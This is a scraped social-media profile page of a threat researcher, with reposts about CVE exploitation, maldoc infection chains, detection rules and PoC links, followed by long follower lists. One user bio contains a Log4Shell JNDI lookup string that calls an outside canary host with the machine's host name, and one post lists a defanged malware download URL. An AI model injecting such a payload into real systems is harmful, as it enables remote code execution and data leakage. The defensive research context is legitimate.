0axx3ss @0axx3ss
#MalwareDissector #ThreatResearcher #CoffeeLover #TechGeek Tweets are my own. Joined May 2009
Tweets 567 · Followers 294 · Following 900 · Likes 4K
If you want to search for EK tasks in @anyrun_app use SID instead of tag. For example, 2024049 and 2024381 are useful for #RigEK, and 4001761 is for #SpelevoEK. There are many other great signatures you can use in search, such as 4001554 and 10004044.
I did a small investigation into the inner workings of CVE-2019-1458. Reported in December, used in the wild. Here is my analysis: github.com/piotrflorczyk/…
Microsoft SharePoint - Deserialization Remote Code Execution POC github.com/Voulnet/deshar…
First exploitation of CVE-2019-0752 found in watering hole websites related to North Korea. Dropped malware is a new version of SLUB, the malware we found in March which uses Slack as C&C blog.trendmicro.com/trendlabs-secu…
In the latest @ESET research, @zuzana_hromcova looks at a campaign that spreads #malware via #torrents, using South Korean TV content as a lure. #infosec #backdoor #cybercrime welivesecurity.com/2019/07/08/sou…
RDP Vuln CVE-2019-0708 aka #BlueKeep Detection. What do we have? Sigma Rules: github.com/Neo23x0/sigma/… github.com/Neo23x0/sigma/… by @markus_neis. Suricata Rule: github.com/nccgroup/Cyber… by @edeca. Scanner: github.com/zerosum0x0/CVE… by @JaGoTu & @zerosum0x0
Interesting #maldoc! xls -> Macro -> PowerShell -> MSBuild -> SILENTTRINITY app.any.run/tasks/71704ca4…
Pushed some #HiddenCobra #YARA rules for HOPLIGHT malware to the public signature-base (immediately available for LOKI, in SPARK Core after QS runs) github.com/Neo23x0/signat…
#PatchTuesday is here, so is my promised blog post. #CVE-2019-084 Windows AppX Deployment Service (AppXSVC) improperly handles hard links allowing for privilege escalation. krbtgt.pw/dacl-permissio…
2019-03-27: [Technical] Let's Learn: Dissecting "Operation #ShadowHammer" #Shellcode Internals in 'crt_ExitProcess' | GetAdaptersInfo MAC Parser -> MD5{Init,Update,Final} | memcmp MD5 Targeted List | C2 Comm | Oddity -> +7 Days ⏲️ File Logger .ini Setup 🔦 vkremez.com/2019/03/lets-l…
Interesting #maldoc! doc -> Macro -> VBScript -> C# (AMSI Bypass + PowerShell without PowerShell) -> PowerShell RAT🤔 app.any.run/tasks/86a188db…
#MuddyWater #maldoc doc -> Macro -> VBScript -> PowerShell -> #POWERSTATS app.any.run/tasks/c1475060…
Network Forensics, Part 2: Packet-Level Analysis of the NSA's EternalBlue Exploit #dfir #digitalforensics #cybersecurity #eternalblue bit.ly/2SgKCyK
Warning! The #WinRAR vulnerability (#CVE-2018-20250) exploit has been upgraded: it uses social engineering to lure victims with embedded image files and encrypts the malicious ACE archive before delivery. Analysis report: ti.360.net/blog/articles/… Chinese version: mp.weixin.qq.com/s/hAoee3Z90Fyx…
#APT #ACE CVE-2018-20250 exploit vulnerability, APT attack on second North American summit, 'Operation Hiden Python' blog.alyac.co.kr/2160
Possibly the first malware delivered through mail to exploit the WinRAR vulnerability. The backdoor is generated by MSF and written to the global startup folder by WinRAR if UAC is turned off. virustotal.com/#/file/7871204… IOC: hxxp://138.204.171.108/BxjL5iKld8.zip 138.204.171.108:443
My next C2 will be hosted in Excel. github.com/michaelneu/web… combined with Excel Add-in for persistence, Excel DDE for lateral movement, and Excel IQY files for execution. A full testing framework in Excel.

Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
blackorbird @blackorbird
36K Followers 672 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit #CTI Need Job
Andrew Thompson @ImposeCost
39K Followers 1K Following Head of Global Signals Operations @Google Threat Intelligence Group via @Mandiant acquisition. Posts are attributable to me—not my employer. Former @USMC.
Mohammed @ItsMohCy
0 Followers 20 Following The first Iraqi digital identity specialising in cyber threat intelligence 🇮🇶 | Publishing analyses, tools and real vulnerabilities in plain language
timlake @timlake252160
0 Followers 2K Following
Lifir @Lifir529
86 Followers 3K Following
nanjin002 @nanjin00272827
21 Followers 4K Following
crawler_cookie_0 @crawler_cookie0
53 Followers 4K Following
Raybo 🍺 @lewiray
841 Followers 3K Following #CyberSecurity, #Sysadmin, wife, four kids and #SCUBA occupy most of my time. US Army vet. Life is good! All my opinions are belong to me. Cheers!
Mathew @mittypk
1K Followers 758 Following Frontline Intel Ops 🦅 Advanced Practices @Mandiant | AU Military DCO | My views are my own
Satans0days @satans0days
19 Followers 127 Following Hacker clothing line, for hackers, created by hackers. Owner: @REal0day
AxN788CN @TranTuan3042022
0 Followers 4K Following
Albert Aktemor @AAktemor
4 Followers 225 Following
Bilal Muqeet. @blmqt
630 Followers 3K Following Incident Response, APT enthusiast GCIH, CRTP, eCTHP, eCIR Occasional bug bounty hunter @ https://t.co/cFXGkB0i6U #infosec #cybersecurity #blueteam
Adrian Cristian Pop @AdrianCristianP
13 Followers 1K Following
Marcos Vinicios (MV) @iamveene
111 Followers 3K Following I'm here for Offensive Security, Threat Intelligence, Reverse Engineering, Malware Analysis, DFIR, Defense Evasion, Windows Internals, and cyber black magic.
Jared Wilson @JWilsonSecurity
2K Followers 1K Following Mandiant Research and Discovery, Father, Husband, Trail Runner, Co-Founder CyberFriendsCircle
Lawrence @Lawrenc52280603
231 Followers 2K Following Research And Security. Want to learn and help the IT community. Tweets are my own
Steve YARA Synapse Mi... @stvemillertime
17K Followers 1K Following threat intelligence @google writing & sharing on adversary tradecraft, malware, threat detection, AI-nexus intel and all things #yara
⚛️ Marcin Siedlar... @siedlmar
2K Followers 1K Following Technical attribution of cyber threats | Frontline Intrusion Intelligence 🦅 @Mandiant
Hayabussy @_hayabussy
674 Followers 259 Following
0x4143 @0x4143
2K Followers 5K Following Purple Teaming by day, Malware Hunter by night 🏴 (All opinions are my own, not of my employer)
Hieu Tran @HieuTra34558978
160 Followers 179 Following Threat Detection Engineer at FPT and also a Dota2 Player.
🅾🅻🅸🆅🅸... @Olivia_99680
45 Followers 2K Following Do you want to get my most favorite photo in Direct? Add me!I want to meet new guys! 😊😊😚
avallach (@xorhex@inf... @xorhex
1K Followers 1K Following 🇺🇦Malware Researcher 🇺🇦 Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0
Bertrands Deals @BertrandsDeals
138 Followers 2K Following Bertrands Deals is an e-commerce focused on providing great deals on electronics! We offer laptops, headphones, tablets, smartphones, & more! Come check us out.
N00b_Master @N00bMaster2
7 Followers 224 Following
Aragorn Tseng @Aragorntseng
454 Followers 408 Following Malware Researcher / Incident Response / Threat Intelligence
Adrian Hernandez @Sapphirex00
782 Followers 411 Following Threat Analysis in Advanced Practices🦅 @Mandiant @Google. Interested in CNE and Intelligence. Personal account, my opinions are my own.
1xd @1xd18
36 Followers 612 Following Security Analyst in Beijing, Threat Intelligence & Machine Learning & DeepLearning & APT Researcher.
YCY @batrix20
254 Followers 443 Following 🇹🇼 Malware Research Freelancer / Threat Intelligence Analyst / Security Engineer * My thoughts are my own *
tjm-111 @tjm_1232
7 Followers 451 Following
AV-ATLAS @avatlasorg
204 Followers 182 Following AV-TEST Platform. Legal Notice https://t.co/jf3pK3zvRT… & Data Privacy https://t.co/keSdq5udqK
___alecs @_____alecs_____
33 Followers 2K Following
Jawaid Ali @NetscalerJunkie
1K Followers 3K Following Head of Security, GDPR Practitioner. Tackling #CISSP & #OSCP.
BlackOpsCTI 🇺🇦 @OpsCti
80 Followers 1K Following Eat | Sleep | Hack | Repeat #ThreatIntelligence #Malware #APT #NewsHunter #DataLeak
cti0x @Cti0x
25 Followers 2K Following
Menard Osena @Menardconnect
1K Followers 554 Following Product Manager/Program Manager. Views are my own. Tweets on Tech, Infosec, Malware, Games & the Philippines.
Albert Zsigovits @albertzsigovits
2K Followers 2K Following Senior Malware Researcher @VMRay 🤖👾🧬🦠 | #malware #ransomware #dfir #apt #threatintel #threatresearch | Opinions expressed are strictly my own.
hideo @hideo_is
410 Followers 4K Following
Florian Roth ⚡️ @cyb3rops
207K Followers 3K Following Head of Research @nextronsystems #DFIR #YARA #Sigma | detection engineer | creator of @thor_scanner, Aurora, Sigma, LOKI, YARA-Forge | always busy ⌚️🐇 | vi/vim
James @James_inthe_box
22K Followers 466 Following
MalwareHunterTeam @malwrhunterteam
245K Followers 38 Following Official MHT Twitter account. Check out ID Ransomware (created by @demonslay335). More photos & gifs, less malware.
Nicolas Krassas @Dinosn
147K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3
Karsten Hahn @struppigel
25K Followers 767 Following MalwareAnalysisForHedgehogs, Principal Malware Researcher at GDATA, he/him 🦔🌈🏳️⚧️
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
BleepingComputer @BleepinComputer
241K Followers 202 Following Breaking cybersecurity and technology news, guides, and tutorials that help you get the most from your computer. DMs are open, so send us those tips!
blackorbird @blackorbird
36K Followers 672 Following Peace and Love. Just Analysis/Hunter. #APT #threatIntelligence #Exploit #CTI Need Job
Binni Shah @binitamshah
141K Followers 165 Following Linux Evangelist, Malwares, Security enthusiast, Investor, Contrarian, Philanthropist, Reformist, Sigma female 🦋 https://t.co/WOvf41tMKV
John Hultquist @JohnHultquist
29K Followers 1K Following Chief Analyst, Google Threat Intelligence Group. @CYBERWARCON and @SLEUTHCON founder. Johns Hopkins professor. Army vet.
Andrew Thompson @ImposeCost
39K Followers 1K Following Head of Global Signals Operations @Google Threat Intelligence Group via @Mandiant acquisition. Posts are attributable to me—not my employer. Former @USMC.
Virus Bulletin @virusbtn
60K Followers 1K Following Security information portal, testing and certification body. Organisers of the annual Virus Bulletin conference. @[email protected]
Van @Wanna_VanTa
4K Followers 392 Following Research & Discovery Lead @Mandiant @googlecloud Specialties: researching adversary tradecraft, hardstuck masters TFT, and losing sneaker raffles.
hasherezade @hasherezade
89K Followers 911 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Dan Perez @MrDanPerez
4K Followers 1K Following 🇨🇳Mission TL @Google | #Malware Naming Wizard | #Attribution Connoisseur | All tweets are my own. #ThreatIntel #APT
Mandiant (part of Goo... @Mandiant
127K Followers 4K Following We’re determined to make organizations secure against cyber threats and confident in their readiness.
Chad Tilbury @chadtilbury
22K Followers 599 Following Digital forensics and incident response. Ex-AFOSI, Mandiant, and CrowdStrike. SANS Institute Fellow and co-author of #FOR500 and #FOR508 courses.
Microsoft Threat Inte... @MsftSecIntel
187K Followers 1K Following We are Microsoft's global network of security experts. Follow for security research and threat intelligence.
x0rz @x0rz
96K Followers 420 Following Cybersecurity & Threat Intelligence. Knowledge is power, France is bacon 🥓
Super Sheep (@qutluch... @Qutluch
451 Followers 3K Following When these frail shadows we inhabit now have quit the stage, we'll meet and raise a glass again together in Valhalla.
Mathew @mittypk
1K Followers 758 Following Frontline Intel Ops 🦅 Advanced Practices @Mandiant | AU Military DCO | My views are my own
No Starch Press @nostarch
36K Followers 3K Following The finest in geek entertainment. Email us: [email protected] We're live M-F, 7am-6pm PDT
Shodan @shodanhq
109K Followers 2 Following Monitor your external network, search the Internet of Things and perform empirical market research. You can also find us on https://t.co/nPLFbFy8R5
Reverse Engineering a... @re_and_more
15K Followers 521 Following RE and More by Alexey Kleymenov (https://t.co/s1pWjL46AW). Private classes and group workshops in malware analysis and reverse engineering. #infosec #malware
#DailyBookDrop📚 @DailyBookDrop
581 Followers 22 Following What @ImposeCost is reading. Drops aren’t necessarily recommendations. Threads often contain snippets. Buy books; support authors. Turn on notifications.
ESET Research @ESETresearch
35K Followers 30 Following Security research and breaking news straight from ESET Research Labs.
Will @BushidoToken
36K Followers 3K Following Senior Threat Intel Advisor @TeamCymru | Co-founder @CuratedIntel | Co-author @SANSForensics FOR589 | Co-founder @BSidesBournemth | @darknetdiaries #126: REvil
Inhee Han @boinya
759 Followers 543 Following Threat Intelligence Researcher GTIG@Google (@Mandiant). Opinions are my own.
Hieu Tran @HieuTra34558978
160 Followers 179 Following Threat Detection Engineer at FPT and also a Dota2 Player.
bubbles @bwithnell
744 Followers 563 Following
DFRLab - @dfrlab.bsky... @DFRLab
53K Followers 762 Following @AtlanticCouncil's Digital Forensic Research Lab. Cultivating a global network of digital forensic analysts (#DigitalSherlocks) to combat disinformation.
Keith KorbenD Wingo @KorbenD_Intel
1K Followers 470 Following Threat synthesis, the Korben Dallas way. Keith Wingo. Christian. Husband. Veteran.
avallach (@xorhex@inf... @xorhex
1K Followers 1K Following 🇺🇦Malware Researcher 🇺🇦 Tweets are my own and do not reflect my employer. On Mastodon as @[email protected] Creator of https://t.co/woQLhjSmV0
Shadow Chaser Group @ShadowChasing1
11K Followers 569 Following Shadow Chaser Group is a sub-group of the GcowSec team which consists of college students who love it. Shadow Chaser Group focused on APT hunt and analysis
tisf @tisfe
99 Followers 120 Following
hex waxwing :(){ :|: ... @hexwaxwing
10K Followers 3K Following //FAILHUNTRESS//// sibyl as a service. curiosity takes precedence; thaasophobic. consilience + negative capability ftw. ¡in girum imus nocte et consumimur igni!
Aragorn Tseng @Aragorntseng
454 Followers 408 Following Malware Researcher / Incident Response / Threat Intelligence
z3r0 @ccxsaber
781 Followers 90 Following
Adrian Hernandez @Sapphirex00
782 Followers 411 Following Threat Analysis in Advanced Practices🦅 @Mandiant @Google. Interested in CNE and Intelligence. Personal account, my opinions are my own.
YCY @batrix20
254 Followers 443 Following 🇹🇼 Malware Research Freelancer / Threat Intelligence Analyst / Security Engineer * My thoughts are my own *
_re_fox @_re_fox
1K Followers 20 Following
neonprimetime @neonprimetime
3K Followers 314 Following detection engineering, malware analysis, IR, threat hunting #DailyThreatHunt, threat intel, blue team, Qradar, Author of now archived @PhishKitTracker project
Cryptolaemus @Cryptolaemus1
20K Followers 207 Following Where are mealybugs now!?! We is hungry and no one wants to play anymore. Where everyone at?
Anonymous @YourAnonCentral
5.3M Followers 928 Following Actions Not Nouns. All that exists is interaction. #Anonymous #BindingChaos Follow us on Bluesky https://t.co/WHmDQZjkDZ
PhishingKitTracker @PhishKitTracker
3K Followers 1 Following Project Paused 1/11/22, Tracked Threat Actor Emails in Phishing Kits. CC @PhishKitTracker if you find a #phishingkit , created by @neonprimetime
AV-ATLAS @avatlasorg
204 Followers 182 Following AV-TEST Platform. Legal Notice https://t.co/jf3pK3zvRT… & Data Privacy https://t.co/keSdq5udqK
Offensive OSINT @the_wojciech
9K Followers 149 Following Pentester/Security Analyst/OSINT Researcher doing cyber security art brut. https://t.co/5bGCU6UuZO https://t.co/GzHh2JDJR5
TeamT5 @TeamT5_Official
2K Followers 22 Following Top Malware Researcher & #Cybersecurity Solution Provider in Asia & Pacific Intelligence Portal: #ThreatVision EDR Solution: #ThreatSonar_Anti_Ransomware
evandrix @evandrix
491 Followers 101 Following ${jndi:ldap://x${hostName}.L4J.mxr7harp21175loyvy9ezpx6s.canarytokens.com/a}
ANY.RUN @anyrun_app
30K Followers 192 Following Empowering businesses with proactive security solutions: Interactive Sandbox, TI Lookup and Feeds. Sign up: https://t.co/8hIX0Qh5ME
Ben Wilson @benhacks
320 Followers 326 Following InfoSec Practitioner 👨💻 | Tinkerer/Hacker 💻🛠️ | Mountain Biker 🚵 | Aussie 🇦🇺
⚛️ Marcin Siedlar... @siedlmar
2K Followers 1K Following Technical attribution of cyber threats | Frontline Intrusion Intelligence 🦅 @Mandiant
Menard Osena @Menardconnect
1K Followers 554 Following Product Manager/Program Manager. Views are my own. Tweets on Tech, Infosec, Malware, Games & the Philippines.
Daniel Lunghi @thehellu
2K Followers 590 Following Threat researcher @TrendMicroRSRCH mostly focused on #APT